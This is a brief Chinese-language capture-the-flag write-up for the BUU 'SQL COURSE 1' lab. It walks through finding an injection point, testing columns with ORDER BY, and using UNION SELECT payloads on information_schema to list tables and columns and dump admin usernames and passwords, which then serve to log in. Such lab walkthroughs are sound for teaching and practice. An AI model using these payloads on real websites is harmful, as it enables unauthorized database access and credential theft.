BUU SQL COURSE 1"/>
BUU SQL COURSE 1
BUU SQL COURSE 1
1.打开每一个网页都遛了一遍,没发现什么,但是在f12的网络里找到了端倪,明显是个注入点
2.访问页面后开始注入(注意要把#的地方换成backend查看后台数据,不然可能看不到回显)
先测试回显位置
id=1 order by 1
id=1 order by 2
id=1 order by 3//开始没有回显
然后开始注入
?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
//查看表名
?id=0 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
//查看列名
?id=0 union select group_concat(username),group_concat(password) from admin#
//查看字段,得到admin和password
3.用刚才拿到的username和passwd回到一开始的登陆页面输入再登陆,flag就出来啦。
没有什么过滤和其他难点,主要是要找到注入点和看回显的位置
更多推荐
BUU SQL COURSE 1
发布评论